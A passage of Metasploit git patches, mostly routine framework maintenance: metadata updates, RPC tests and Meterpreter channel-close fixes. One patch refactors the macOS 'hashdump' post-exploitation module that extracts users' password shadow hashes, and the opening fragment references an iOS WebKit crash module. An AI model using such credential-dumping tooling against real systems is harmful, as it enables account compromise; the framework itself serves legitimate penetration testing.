a vulnerable device, it should crash the operating system +1. When you visit the page on a vulnerable device, it should crash the operating system ## Scenarios From 6712627a85220c7d7ec53ed7a0558d1ed7ce58c9 Mon Sep 17 00:00:00 2001 From: Metasploit Date: Mon, 24 Sep 2018 09:21:59 -0700 Subject: [PATCH 045/192] automatic module_metadata_base.json update --- db/modules_metadata_base.json | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/db/modules_metadata_base.json b/db/modules_metadata_base.json index 94af409883..86ed49fbc6 100644 --- a/db/modules_metadata_base.json +++ b/db/modules_metadata_base.json @@ -5758,7 +5758,7 @@ "arch": "", "rport": null, "targets": null, - "mod_time": "2018-09-16 19:51:15 +0000", + "mod_time": "2018-09-24 17:10:13 +0000", "path": "/modules/auxiliary/dos/apple_ios/webkit_backdrop_filter_blur.rb", "is_install_path": true, "ref_name": "dos/apple_ios/webkit_backdrop_filter_blur", From cb2f4ae4199e4802aab0feb9962eb4fd15a12831 Mon Sep 17 00:00:00 2001 From: Jeffrey Martin Date: Mon, 24 Sep 2018 14:02:15 -0500 Subject: [PATCH 046/192] Add filter_ports and filter_services to cache When caching metadata about module include `filters` when available. --- lib/msf/core/modules/metadata/obj.rb | 12 ++++++++++++ 1 file changed, 12 insertions(+) diff --git a/lib/msf/core/modules/metadata/obj.rb b/lib/msf/core/modules/metadata/obj.rb index 870548ecfb..c0adf24f5e 100644 --- a/lib/msf/core/modules/metadata/obj.rb +++ b/lib/msf/core/modules/metadata/obj.rb @@ -35,6 +35,10 @@ class Obj attr_reader :arch # @return [Integer] attr_reader :rport + # @return [Array] + attr_reader :filter_ports + # @return [Array] + attr_reader :filter_services # @return [Array] attr_reader :targets # @return [Time] @@ -80,6 +84,12 @@ class Obj @path = module_instance.file_path @mod_time = ::File.mtime(@path) rescue Time.now @ref_name = module_instance.refname + if module_instance.respond_to?('autofilter_ports') + @filter_ports = module_instance.autofilter_ports + end + if module_instance.respond_to?('autofilter_services') + @filter_services = module_instance.autofilter_services + end install_path = Msf::Config.install_root.to_s if (@path.to_s.include? (install_path)) @@ -118,6 +128,8 @@ class Obj 'platform' => @platform, 'arch' => @arch, 'rport' => @rport, + 'filter_ports' => @filter_ports, + 'filter_services' => @filter_services, 'targets' => @targets, 'mod_time' => @mod_time.to_s, 'path' => @path, From ea888eaa7c95309a921a1dffd746a652414dc91f Mon Sep 17 00:00:00 2001 From: Matthew Kienow Date: Mon, 24 Sep 2018 17:22:25 -0400 Subject: [PATCH 047/192] Add method comments for raise --- lib/msf/core/rpc/json/rpc_command.rb | 1 + lib/msf/core/rpc/json/v1_0/rpc_command.rb | 1 + 2 files changed, 2 insertions(+) diff --git a/lib/msf/core/rpc/json/rpc_command.rb b/lib/msf/core/rpc/json/rpc_command.rb index 0086dd5bbe..a995940a72 100644 --- a/lib/msf/core/rpc/json/rpc_command.rb +++ b/lib/msf/core/rpc/json/rpc_command.rb @@ -32,6 +32,7 @@ module Msf::RPC::JSON # @param method [String] the RPC method name # @param params [Array, Hash] parameters for the RPC call # @raise [MethodNotFound] The method does not exist + # @raise [Timeout::Error] The method failed to terminate in @execute_timeout seconds # @returns [Object] the method's return value. def execute(method, params) unless @methods.key?(method) diff --git a/lib/msf/core/rpc/json/v1_0/rpc_command.rb b/lib/msf/core/rpc/json/v1_0/rpc_command.rb index 93f7ea5ba1..12f058ec15 100644 --- a/lib/msf/core/rpc/json/v1_0/rpc_command.rb +++ b/lib/msf/core/rpc/json/v1_0/rpc_command.rb @@ -48,6 +48,7 @@ module Msf::RPC::JSON # @param method [String] the RPC method name # @param params [Array, Hash] parameters for the RPC call # @raise [MethodNotFound] The method does not exist + # @raise [Timeout::Error] The method failed to terminate in @execute_timeout seconds # @returns [Object] the method's return value. def execute_internal(method, params) group, base_method = parse_method_group(method) From ab443831a952e776743ac041d5121e3bf92743cb Mon Sep 17 00:00:00 2001 From: Matthew Kienow Date: Mon, 24 Sep 2018 17:27:06 -0400 Subject: [PATCH 048/192] Add RSpec for Msf::RPC::JSON::Dispatcher --- spec/lib/msf/core/rpc/json/dispatcher_spec.rb | 301 ++++++++++++++++++ 1 file changed, 301 insertions(+) create mode 100644 spec/lib/msf/core/rpc/json/dispatcher_spec.rb diff --git a/spec/lib/msf/core/rpc/json/dispatcher_spec.rb b/spec/lib/msf/core/rpc/json/dispatcher_spec.rb new file mode 100644 index 0000000000..0bb8f88d46 --- /dev/null +++ b/spec/lib/msf/core/rpc/json/dispatcher_spec.rb @@ -0,0 +1,301 @@ +require 'spec_helper' +require 'json' + +require 'msf/core/rpc' + +RSpec.describe Msf::RPC::JSON::Dispatcher do + include_context 'Msf::Simple::Framework' + + def to_json(data) + return nil if data.nil? + + json = data.to_json + return json.to_s + end + + describe '#process' do + + before(:each) do + # prepare a dispatcher for all of the tests + @dispatcher = Msf::RPC::JSON::Dispatcher.new(framework) + end + + context 'invalid JSON-RPC request' do + + before(:each) do + # mock RpcCommand behavior as it isn't relevant for JSON-RPC validation + cmd = instance_double('RpcCommand') + allow(cmd).to receive(:execute).with(instance_of(String), instance_of(Array)).and_return({}) + allow(cmd).to receive(:execute).with(instance_of(String), instance_of(Hash)).and_return({}) + allow(cmd).to receive(:execute).with(instance_of(String), nil).and_return({}) + @dispatcher.set_command(cmd) + end + + context 'is not valid JSON' do + it 'contains only a string' do + expected_response = { + jsonrpc: '2.0', + error: { + code: -32700, + message: 'Invalid JSON was received by the server. An error occurred on the server while parsing the JSON text.' + }, + id: nil + } + expect(@dispatcher.process("Ce n'est pas un JSON")).to eq(expected_response.to_json) + end + end + + context 'is not a valid request object' do + expected_response = { + jsonrpc: '2.0', + error: { + code: -32600, + message: 'The JSON sent is not a valid Request object.' + }, + id: nil + } + + it 'does not contain required jsonrpc member' do + request = '{ "method": "unit-test" }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + + it 'does not contain required method member' do + request = '{ "jsonrpc": "2.0" }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + + it 'does not contain valid JSON-RPC version number' do + request = '{ "jsonrpc": "1.0", "method": "unit-test" }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + + it 'is an empty JSON object' do + expect(@dispatcher.process('{}')).to eq(expected_response.to_json) + end + + it 'is an array with an empty JSON object' do + expect(@dispatcher.process('[{}]')).to eq([expected_response].to_json) + end + + it 'is an array with an empty array' do + expect(@dispatcher.process('[[]]')).to eq([expected_response].to_json) + end + + it 'is an array with a string' do + expect(@dispatcher.process('["bad"]')).to eq([expected_response].to_json) + end + + it 'is an array with a number' do + expect(@dispatcher.process('[123456]')).to eq([expected_response].to_json) + end + + it 'is an array with true' do + expect(@dispatcher.process('[true]')).to eq([expected_response].to_json) + end + + it 'is an array with false' do + expect(@dispatcher.process('[false]')).to eq([expected_response].to_json) + end + + it 'is an array with null' do + expect(@dispatcher.process('[null]')).to eq([expected_response].to_json) + end + + context 'contains incorrect data type' do + context 'jsonrpc' do + it 'is a number' do + request = '{ "jsonrpc": 2.0, "method": "unit-test" }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + + it 'is an empty JSON object' do + request = '{ "jsonrpc": {}, "method": "unit-test" }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + + it 'is an empty array' do + request = '{ "jsonrpc": [], "method": "unit-test" }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + + it 'is null' do + request = '{ "jsonrpc": null, "method": "unit-test" }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + end + + context 'method' do + it 'is a number' do + request = '{ "jsonrpc": "2.0", "method": 123456 }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + + it 'is an empty JSON object' do + request = '{ "jsonrpc": "2.0", "method": {} }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + + it 'is an empty array' do + request = '{ "jsonrpc": "2.0", "method": [] }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + + it 'is null' do + request = '{ "jsonrpc": "2.0", "method": null }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + end + + context 'params' do + it 'is a number' do + request = '{ "jsonrpc": "2.0", "method": "unit-test", "params": 123456 }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + + it 'is a string' do + request = '{ "jsonrpc": "2.0", "method": "unit-test", "params": "bad-params" }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + + it 'is true' do + request = '{ "jsonrpc": "2.0", "method": "unit-test", "params": true }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + + it 'is false' do + request = '{ "jsonrpc": "2.0", "method": "unit-test", "params": false }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + + it 'is null' do + request = '{ "jsonrpc": "2.0", "method": "unit-test", "params": null }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + end + + context 'id' do + it 'is an empty JSON object' do + request = '{ "jsonrpc": "2.0", "method": "unit-test", "id": {} }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + + it 'is an empty array' do + request = '{ "jsonrpc": "2.0", "method": "unit-test", "id": [] }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + + it 'is an array that contains a number' do + request = '{ "jsonrpc": "2.0", "method": "unit-test", "id": [1] }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + + it 'is a number that contain fractional parts' do + request = '{ "jsonrpc": "2.0", "method": "unit-test", "id": 3.14 }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + + it 'is true' do + request = '{ "jsonrpc": "2.0", "method": "unit-test", "id": true }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + + it 'is false' do + request = '{ "jsonrpc": "2.0", "method": "unit-test", "id": false }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + end + end + end + end + + context 'errors on JSON-RPC method execute' do + it 'does not contain valid method name' do + # mock RpcCommand behavior for MethodNotFound exception + method_name = 'DNE' + cmd = instance_double('RpcCommand') + allow(cmd).to receive(:execute).with(instance_of(String), instance_of(Array)).and_raise(Msf::RPC::JSON::MethodNotFound.new(method_name)) + allow(cmd).to receive(:execute).with(instance_of(String), instance_of(Hash)).and_raise(Msf::RPC::JSON::MethodNotFound.new(method_name)) + allow(cmd).to receive(:execute).with(instance_of(String), nil).and_raise(Msf::RPC::JSON::MethodNotFound.new(method_name)) + @dispatcher.set_command(cmd) + + expected_response = { + jsonrpc: '2.0', + error: { + code: -32601, + message: 'The method %s does not exist.' % { name: method_name } + }, + id: 1 + } + request = '{ "jsonrpc": "2.0", "method": "DNE", "params": [], "id": 1 }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + + it 'does not contain valid method params' do + # mock RpcCommand behavior for InvalidParams exception + cmd = instance_double('RpcCommand') + allow(cmd).to receive(:execute).with(instance_of(String), instance_of(Array)).and_raise(ArgumentError) + allow(cmd).to receive(:execute).with(instance_of(String), instance_of(Hash)).and_raise(ArgumentError) + allow(cmd).to receive(:execute).with(instance_of(String), nil).and_raise(ArgumentError) + @dispatcher.set_command(cmd) + + expected_response = { + jsonrpc: '2.0', + error: { + code: -32602, + message: 'Invalid method parameter(s).' + }, + id: 1 + } + request = '{ "jsonrpc": "2.0", "method": "unit-test", "params": ["method-has-no-params"], "id": 1 }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + + it 'throws Msf::RPC::Exception' do + # mock RpcCommand behavior for Msf::RPC::Exception exception + error_code = 123 + error_msg = 'unit-test' + cmd = instance_double('RpcCommand') + allow(cmd).to receive(:execute).with(instance_of(String), nil).and_raise(Msf::RPC::Exception.new(error_code, error_msg)) + allow(cmd).to receive(:execute).with(instance_of(String), nil).and_raise(Msf::RPC::Exception.new(error_code, error_msg)) + allow(cmd).to receive(:execute).with(instance_of(String), nil).and_raise(Msf::RPC::Exception.new(error_code, error_msg)) + @dispatcher.set_command(cmd) + + expected_response = { + jsonrpc: '2.0', + error: { + code: -32000, + message: 'Application server error: %s' % { msg: error_msg }, + data: { + code: error_code + } + }, + id: 1 + } + request = '{ "jsonrpc": "2.0", "method": "unit-test", "id": 1 }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + + it 'throws StandardError' do + # mock RpcCommand behavior for StandardError exception + error_msg = 'unit-test' + cmd = instance_double('RpcCommand') + allow(cmd).to receive(:execute).with(instance_of(String), nil).and_raise(StandardError.new(error_msg)) + allow(cmd).to receive(:execute).with(instance_of(String), nil).and_raise(StandardError.new(error_msg)) + allow(cmd).to receive(:execute).with(instance_of(String), nil).and_raise(StandardError.new(error_msg)) + @dispatcher.set_command(cmd) + + expected_response = { + jsonrpc: '2.0', + error: { + code: -32000, + message: 'Application server error: %s' % { msg: error_msg } + }, + id: 1 + } + request = '{ "jsonrpc": "2.0", "method": "unit-test", "id": 1 }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + end + end +end From c89d8f8fb7ef1f3ad540ed72429a482e59a98958 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Mon, 24 Sep 2018 22:17:32 -0500 Subject: [PATCH 049/192] fix user enumeration methods, be more robust --- lib/msf/core/post/osx/system.rb | 28 +++++++++++++++++----------- 1 file changed, 17 insertions(+), 11 deletions(-) diff --git a/lib/msf/core/post/osx/system.rb b/lib/msf/core/post/osx/system.rb index 51dccf89e2..ca59a54902 100644 --- a/lib/msf/core/post/osx/system.rb +++ b/lib/msf/core/post/osx/system.rb @@ -27,14 +27,15 @@ module Msf::Post::OSX::System def get_users cmd_output = cmd_exec("/usr/bin/dscacheutil -q user") users = [] - users_arry = cmd_output.split("\n\n") + users_arry = cmd_output.tr("\r", "").split("\n\n") users_arry.each do |u| entry = Hash.new u.each_line do |l| field,val = l.chomp.split(": ") next if field == "password" - entry[field] = val.chomp - + unless val.nil? + entry[field] = val.strip + end end users << entry end @@ -48,15 +49,17 @@ module Msf::Post::OSX::System def get_system_accounts cmd_output = cmd_exec("/usr/bin/dscacheutil -q user") users = [] - users_arry = cmd_output.split("\n\n") + users_arry = cmd_output.tr("\r", "").split("\n\n") users_arry.each do |u| entry = {} u.each_line do |l| field,val = l.chomp.split(": ") next if field == "password" - entry[field] = val.chomp + unless val.nil? + entry[field] = val.strip + end end - next if entry["name"] !~ /^_/ + next if entry["name"][0] != '_' users << entry end return users @@ -69,15 +72,17 @@ module Msf::Post::OSX::System def get_nonsystem_accounts cmd_output = cmd_exec("/usr/bin/dscacheutil -q user") users = [] - users_arry = cmd_output.split("\n\n") + users_arry = cmd_output.tr("\r", "").split("\n\n") users_arry.each do |u| entry = {} u.each_line do |l| field,val = l.chomp.split(": ") next if field == "password" - entry[field] = val.chomp + unless val.nil? + entry[field] = val.strip + end end - next if entry["name"] =~ /^_/ + next if entry["name"][0] == '_' users << entry end return users @@ -96,8 +101,9 @@ module Msf::Post::OSX::System u.each_line do |l| field,val = l.chomp.split(": ") next if field == "password" - entry[field] = val.chomp - + unless val.nil? + entry[field] = val.strip + end end groups << entry end From 3e61a98f25f84aeb5270268b7c5cbb125b67bc7c Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Mon, 24 Sep 2018 22:17:58 -0500 Subject: [PATCH 050/192] use non-system users for hashdump --- modules/post/osx/gather/hashdump.rb | 14 ++++---------- 1 file changed, 4 insertions(+), 10 deletions(-) diff --git a/modules/post/osx/gather/hashdump.rb b/modules/post/osx/gather/hashdump.rb index 9447ec3a20..e4ef62c25a 100644 --- a/modules/post/osx/gather/hashdump.rb +++ b/modules/post/osx/gather/hashdump.rb @@ -12,6 +12,7 @@ class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::OSX::Priv + include Msf::Post::OSX::System include Msf::Auxiliary::Report def initialize(info={}) @@ -44,7 +45,8 @@ class MetasploitModule < Msf::Post end # iterate over all users - users.each do |user| + get_nonsystem_accounts.each do |user_info| + user = user_info['name'] next if datastore['MATCHUSER'].present? and datastore['MATCHUSER'] !~ user print_status "Attempting to grab shadow for user #{user}..." if gt_lion? # 10.8+ @@ -201,16 +203,8 @@ class MetasploitModule < Msf::Post shadow_bytes.sub!(/^dsAttrTypeNative:ShadowHashData:/, '') end - # @return [Array] list of user names - def users - tmp = cmd_exec("dscacheutil -q user").split(/$/).map(&:strip) #- OSX_IGNORE_ACCOUNTS - res = Array.new() - tmp.each_with_index{ |val, index| res << val.split("name: ")[1] if val.include?("name: ") and tmp[index+1].include?("**")} - res - end - # @return [String] version string (e.g. 10.8.5) def ver_num - @version ||= cmd_exec("/usr/bin/sw_vers -productVersion").chomp + @product_version ||= get_sysinfo['ProductVersion'] end end From 2eb675ea95405a215bc18d04cca322c2dfe95e3f Mon Sep 17 00:00:00 2001 From: Metasploit Date: Mon, 24 Sep 2018 20:26:20 -0700 Subject: [PATCH 051/192] automatic module_metadata_base.json update --- db/modules_metadata_base.json | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/db/modules_metadata_base.json b/db/modules_metadata_base.json index 86ed49fbc6..31524bb2c2 100644 --- a/db/modules_metadata_base.json +++ b/db/modules_metadata_base.json @@ -117686,7 +117686,7 @@ "arch": "", "rport": null, "targets": null, - "mod_time": "2018-05-22 22:25:39 +0000", + "mod_time": "2018-09-24 22:17:58 +0000", "path": "/modules/post/osx/gather/hashdump.rb", "is_install_path": true, "ref_name": "osx/gather/hashdump", From dfb6f1f5548fb647b8731d7f228c487900ad95ac Mon Sep 17 00:00:00 2001 From: Green-m Date: Tue, 25 Sep 2018 11:53:24 +0800 Subject: [PATCH 052/192] Fix undefined method `session` issue, thx wchen-r7 --- spec/lib/msf/ui/console/command_dispatcher/core_spec.rb | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/spec/lib/msf/ui/console/command_dispatcher/core_spec.rb b/spec/lib/msf/ui/console/command_dispatcher/core_spec.rb index 9ab56a0c38..29824a0f01 100644 --- a/spec/lib/msf/ui/console/command_dispatcher/core_spec.rb +++ b/spec/lib/msf/ui/console/command_dispatcher/core_spec.rb @@ -89,6 +89,11 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Core do # always assume set variables validate (largely irrelevant because ours are random) allow(driver).to receive(:on_variable_set).and_return(true) + double = double('framework') + allow(double).to receive(:get).and_return(nil) + allow(double).to receive(:sessions).and_return([]) + allow_any_instance_of(Msf::Post).to receive(:framework).and_return(double) + # Test for setting uncomplete option output = core.cmd_set_tabs(option, ["set"]) expect(output).to be_kind_of(Array).or eq(nil) From b5df80d64b19bdc7e5cea64354bf4a778b1f5478 Mon Sep 17 00:00:00 2001 From: Green-m Date: Tue, 25 Sep 2018 14:07:54 +0800 Subject: [PATCH 053/192] Add require readline to fix uninit issue. --- spec/lib/msf/ui/console/command_dispatcher/core_spec.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/spec/lib/msf/ui/console/command_dispatcher/core_spec.rb b/spec/lib/msf/ui/console/command_dispatcher/core_spec.rb index 29824a0f01..ceb43b8b8a 100644 --- a/spec/lib/msf/ui/console/command_dispatcher/core_spec.rb +++ b/spec/lib/msf/ui/console/command_dispatcher/core_spec.rb @@ -3,6 +3,7 @@ require 'spec_helper' require 'msf/ui' require 'msf/ui/console/module_command_dispatcher' require 'msf/ui/console/command_dispatcher/core' +require 'readline' RSpec.describe Msf::Ui::Console::CommandDispatcher::Core do include_context 'Msf::DBManager' From 1a493c45089b82530a8fa6520eb8edb4c42a6d6d Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Tue, 25 Sep 2018 02:30:38 -0500 Subject: [PATCH 054/192] Only send a close channel message once, avoid if Meterpreter told us Don't send a close message for a nil channel ID, and if we do send a close message, only do it once. I could have added a mutex somewher in _close(), but because it's a class method, it's a little awkward and would require all of the callers to instead have voluntary lock. As an alternative, I just made the finalizer close the channel instead. Fixes #10177 --- lib/rex/post/meterpreter/channel.rb | 21 +++++++++---------- .../socket_subsystem/tcp_client_channel.rb | 2 ++ 2 files changed, 12 insertions(+), 11 deletions(-) diff --git a/lib/rex/post/meterpreter/channel.rb b/lib/rex/post/meterpreter/channel.rb index 10dc519467..cf86ef5f52 100644 --- a/lib/rex/post/meterpreter/channel.rb +++ b/lib/rex/post/meterpreter/channel.rb @@ -150,8 +150,12 @@ class Channel ObjectSpace.define_finalizer(self, self.class.finalize(client, cid)) end - def self.finalize(client,cid) - proc { self._close(client,cid) } + def self.finalize(client, cid) + proc { + unless cid.nil? + self._close(client, cid) + end + } end ## @@ -301,11 +305,7 @@ class Channel end def _close(addends = nil) - unless self.cid.nil? - ObjectSpace.undefine_finalizer(self) - self.class._close(self.client, self.cid, addends) - self.cid = nil - end + # let the finalizer do the work behind the scenes end # # Enables or disables interactive mode. @@ -370,7 +370,9 @@ class Channel # Stub close handler. # def dio_close_handler(packet) - client.remove_channel(self.cid) + cid = self.cid + self.cid = nil + client.remove_channel(cid) # Trap IOErrors as parts of the channel may have already been closed begin @@ -378,9 +380,6 @@ class Channel rescue IOError end - # No more channel action, foo. - self.cid = nil - return true end diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb index 5f6a28aaf8..c20bc250a5 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb @@ -98,6 +98,8 @@ class TcpClientChannel < Rex::Post::Meterpreter::Stream # 2 -> both # def shutdown(how = 1) + return false if self.cid.nil? + request = Packet.create_request('stdapi_net_socket_tcp_shutdown') request.add_tlv(TLV_TYPE_SHUTDOWN_HOW, how) From 94988e26e09613a9d1062477378082807e88ddf9 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Tue, 25 Sep 2018 09:57:45 -0500 Subject: [PATCH 055/192] add mutex on closes --- lib/rex/post/meterpreter/channel.rb | 14 ++++++++++++-- 1 file changed, 12 insertions(+), 2 deletions(-) diff --git a/lib/rex/post/meterpreter/channel.rb b/lib/rex/post/meterpreter/channel.rb index cf86ef5f52..ebd68d032e 100644 --- a/lib/rex/post/meterpreter/channel.rb +++ b/lib/rex/post/meterpreter/channel.rb @@ -140,6 +140,7 @@ class Channel self.cid = cid self.type = type self.flags = flags + @mutex = Mutex.new # Add this instance to the list if (cid and client) @@ -306,6 +307,13 @@ class Channel def _close(addends = nil) # let the finalizer do the work behind the scenes + @mutex.synchronize { + unless self.cid.nil? + ObjectSpace.undefine_finalizer(self) + self.class._close(self.client, self.cid, addends) + self.cid = nil + end + } end # # Enables or disables interactive mode. @@ -370,8 +378,10 @@ class Channel # Stub close handler. # def dio_close_handler(packet) - cid = self.cid - self.cid = nil + @mutex.synchronize { + cid = self.cid + self.cid = nil + } client.remove_channel(cid) # Trap IOErrors as parts of the channel may have already been closed From 2db32799562a1546fdcd28a88662b28250d4cec3 Mon Sep 17 00:00:00 2001 From: Jeffrey Martin Date: Tue, 25 Sep 2018 15:04:26 -0500 Subject: [PATCH 056/192] use symbols and match filter keys to code --- lib/msf/core/modules/metadata/obj.rb | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/lib/msf/core/modules/metadata/obj.rb b/lib/msf/core/modules/metadata/obj.rb index c0adf24f5e..83717e9029 100644 --- a/lib/msf/core/modules/metadata/obj.rb +++ b/lib/msf/core/modules/metadata/obj.rb @@ -36,9 +36,9 @@ class Obj # @return [Integer] attr_reader :rport # @return [Array] - attr_reader :filter_ports + attr_reader :autofilter_ports # @return [Array] - attr_reader :filter_services + attr_reader :autofilter_services # @return [Array] attr_reader :targets # @return [Time] @@ -84,11 +84,11 @@ class Obj @path = module_instance.file_path @mod_time = ::File.mtime(@path) rescue Time.now @ref_name = module_instance.refname - if module_instance.respond_to?('autofilter_ports') - @filter_ports = module_instance.autofilter_ports + if module_instance.respond_to?(:autofilter_ports) + @autofilter_ports = module_instance.autofilter_ports end - if module_instance.respond_to?('autofilter_services') - @filter_services = module_instance.autofilter_services + if module_instance.respond_to?(:autofilter_services) + @autofilter_services = module_instance.autofilter_services end install_path = Msf::Config.install_root.to_s @@ -128,8 +128,8 @@ class Obj 'platform' => @platform, 'arch' => @arch, 'rport' => @rport, - 'filter_ports' => @filter_ports, - 'filter_services' => @filter_services, + 'autofilter_ports' => @autofilter_ports, + 'autofilter_services'=> @autofilter_services, 'targets' => @targets, 'mod_time' => @mod_time.to_s, 'path' => @path, From dcb96c20a01b38ce3ccd098251887ee42e42ee96 Mon Sep 17 00:00:00 2001 From: Metasploit Date: Tue, 25 Sep 2018 16:06:15 -0700 Subject: [PATCH 057/192] automatic module_metadata_base.json update --- db/modules_metadata_base.json | 29563 ++++++++++++++++++++++++++++++++ 1 file changed, 29563 insertions(+) diff --git a/db/modules_metadata_base.json b/db/modules_metadata_base.json index 31524bb2c2..46e4cd1204 100644 --- a/db/modules_metadata_base.json +++ b/db/modules_metadata_base.json @@ -21,6 +21,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/admin/2wire/xslt_password_reset.rb", @@ -54,6 +69,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb", @@ -84,6 +105,21 @@ "platform": "", "arch": "", "rport": 7000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/appletv/appletv_display_image.rb", @@ -114,6 +150,21 @@ "platform": "", "arch": "", "rport": 7000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/appletv/appletv_display_video.rb", @@ -149,6 +200,12 @@ "platform": "", "arch": "", "rport": 10001, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/atg/atg_client.rb", @@ -179,6 +236,12 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/aws/aws_launch_instances.rb", @@ -212,6 +275,12 @@ "platform": "", "arch": "", "rport": 10000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/backupexec/dump.rb", @@ -243,6 +312,12 @@ "platform": "", "arch": "", "rport": 6106, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-24 21:38:44 +0000", "path": "/modules/auxiliary/admin/backupexec/registry.rb", @@ -272,6 +347,21 @@ "platform": "", "arch": "", "rport": 8008, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/chromecast/chromecast_reset.rb", @@ -301,6 +391,21 @@ "platform": "", "arch": "", "rport": 8008, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/chromecast/chromecast_youtube.rb", @@ -339,6 +444,12 @@ "platform": "", "arch": "", "rport": 161, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/cisco/cisco_asa_extrabacon.rb", @@ -370,6 +481,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb", @@ -402,6 +528,12 @@ "platform": "", "arch": "", "rport": 21, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb", @@ -433,6 +565,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/db2/db2rcmd.rb", @@ -466,6 +606,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/dns/dyn_dns_update.rb", @@ -496,6 +642,12 @@ "platform": "", "arch": "", "rport": 8030, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-07-08 19:00:11 +0000", "path": "/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb", @@ -529,6 +681,21 @@ "platform": "", "arch": 